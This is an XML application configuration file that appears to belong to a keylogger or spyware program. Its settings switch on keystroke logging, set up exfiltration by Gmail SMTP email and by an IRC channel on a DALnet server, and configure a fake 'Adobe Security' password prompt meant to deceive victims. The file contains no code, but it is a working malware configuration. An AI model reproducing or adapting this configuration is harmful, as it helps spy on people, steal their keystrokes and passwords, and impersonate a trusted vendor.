<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <appSettings>
    <add key="use_data_encrypted" value="False"/>
    <add key="timer_interval" value="4000000"/>
    <add key="time_to_update" value="24"/>
    <add key="last_update" value=""/>
    <add key="input_title" value="Adobe Security"/>
    <add key="input_message" value="Enter the password:"/>
    <add key="input_password" value="12345"/>
    <add key="use_keylogger" value="True"/>
    <add key="use_email" value="True"/>
    <add key="use_irc" value="True"/>
    <add key="login" value=""/>
    <add key="password" value=""/>
    <add key="smtp" value="smtp.gmail.com"/>
    <add key="smtp_port" value="587"/>
    <add key="use_ssl" value="True"/>
    <add key="subject" value="yok"/>
    <add key="message" value="yok msg"/>
    <add key="to" value=""/>
    <add key="server" value="broadway.ny.us.dal.net"/>
    <add key="port" value="6667"/>
    <add key="channel" value="#yok"/>
    <add key="nick" value="test"/>
  </appSettings>
</configuration>